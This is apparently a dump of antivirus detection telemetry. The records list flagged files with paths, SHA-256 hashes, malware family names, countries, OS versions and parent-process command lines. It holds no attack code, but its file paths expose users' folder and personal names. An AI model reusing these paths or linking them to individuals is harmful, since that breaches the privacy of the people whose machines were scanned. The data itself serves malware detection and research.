  Row(detection=Row(filename='avscan-20181102-054832-e7102518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054832-E7102518', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050809-42b533f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050809-42B533F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051747-9b3101bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051747-9B3101BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062312-be927d62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062312-BE927D62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050557-f3e77572', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050557-F3E77572', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054147-f5854fc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054147-F5854FC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:35:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7dc7945f86950422e06bbdb366b7cadf1bffdf551e89fdebf61abba37561bb9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\7DC7945F86950422E06BBDB366B7CADF1BFFDF551E89FDEBF61ABBA37561BB9D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7dc7945f86950422e06bbdb366b7cadf1bffdf551e89fdebf61abba37561bb9d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:58:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\1687483A29C55E00B2E6B3F69B81DB32ACF7DF9C79B07A83F3F72067D84EBB31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:37:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='& pengangkatan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\PROMOSI & PENGANGKATAN\\& PENGANGKATAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155349-abaffc0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155349-ABAFFC0E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='karyawan.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\DATA KARYAWAN\\KARYAWAN.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142509-7fc7a02c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7415a523\\AVSCAN-20181101-142455-7D045FA5\\AVSCAN-20181101-142509-7FC7A02C', filesize=2460000, name='TR/Black.Gen2.#M1.#R1'), hash='19babc94dff2820e1c233422d3b417249dae5dea4f17e35492a97ff805b9edf9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lap.bulanan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF\\LAP.BULANAN\\LAP.BULANAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151845-09a7f2e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-151845-09A7F2E9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='config.exe', filepath='\\?\\J:\\العاب2\\بطاطس\\Config.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='1dd4196bdc12a216aaaf81538a99c91bcd32e9bf53a865005c7cf662afd037e3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:11:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3f9b769c3eb222b0fd5c794b17acd464baf795424535f5c71374bbf36ce928fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155501-38eca247', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155501-38ECA247', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh3b75.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH3B75.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='16-01-2013.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\16-01-2013\\16-01-2013.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5180272\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3722568, timestamp='2018-11-01T01:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T23:28:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dokumentasi p3k.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\dokumentasi p3k\\dokumentasi p3k.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe98_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe98 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-174343-82493a89', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-174331-7F9DFBD6\\AVSCAN-20181031-174343-82493A89', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winzip20-new.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-new.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='6e1d6a7d3eafeb79153563f2bafd04e686bbd578a0a1548d4b1a5a45276d1525', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T22:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clsid.bat', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\CLSID.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123154-89dfc64d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123133-777E8816\\AVSCAN-20181101-123154-89DFC64D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:31:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ed5e7843e59a54e604d35b5be24436bfa955d3c247161c3098c971468a850c50', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\ED5E7843E59A54E604D35B5BE24436BFA955D3C247161C3098C971468A850C50', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed5e7843e59a54e604d35b5be24436bfa955d3c247161c3098c971468a850c50', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vziubo[1].jpg', filepath='C:\\Documents and Settings\\X\\Configuración local\\Archivos temporales de Internet\\Content.IE5\\7K1LRDD5\\vziubo[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aujizqyk.dll', filepath='C:\\WINDOWS\\system32\\aujizqyk.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131055-57a4bd6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-131024-3D65AE15\\AVSCAN-20181101-131055-57A4BD6A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e778f2c4-e042-8e12-92c0-f929ce491542.exe', filepath='G:\\{62b7b3df-a488-dda0-1185-787f7297498d}\\e778f2c4-e042-8e12-92c0-f929ce491542.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122837-e1ec4faf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122814-CDCE5420\\AVSCAN-20181101-122837-E1EC4FAF', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:28:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112221-50c2a674', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112221-50C2A674', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chuuxwmr.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\yefcbqzo\\chuuxwmr.exe', filesize=11840000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='68d4f5505110d33eb906307722a519d8f479634aa928fb5a5d3f468db257ebb1', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,verrf', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141140-055964f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141140-055964F7', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005414-b1065dc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4d23901\\AVSCAN-20181102-005403-AE9A368E\\AVSCAN-20181102-005414-B1065DC1', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='be57411ce50887ba2525a238649ebf3c5d31c21ff44f725b30eb7d725f8db271', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:54:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111747-2e1c79b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111747-2E1C79B4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/autostart', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Google\\Drive\\googledrivesync.exe', parentsize=46281248, timestamp='2018-11-01T21:43:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161705-f67d1af5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161705-F67D1AF5', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='802460fbdc7e8d7eb493c9c70e1b858c1c038e1ef8f1d4c9d94941cc6457646a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\802460FBDC7E8D7EB493C9C70E1B858C1C038E1EF8F1D4C9D94941CC6457646A', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='802460fbdc7e8d7eb493c9c70e1b858c1c038e1ef8f1d4c9d94941cc6457646a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:47:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windows 8.1 activator by ahmad magdi.exe', filepath='F:\\Computer\\Windows 8.1 Activator By Ahmad Magdi.exe', filesize=1216000, name='W32/Neshta.A.#M1.#R1'), hash='c89ddf8360bcc355e70782b12fa54a89cac4c209dd726afadd0af5162b386de7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:51:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='splitimage installer.exe', filepath='D:\\data\\Verwaltung\\DOKUMENTE\\Mitarbeiter-Ordner\\Christian\\Programme\\SplitImage Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='b30aff950626878c86e748618b64865f7c239296b6253c4a142a906e949ecbb5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:31:50Z'), dt=datetime.date(2018, 11, 1)),
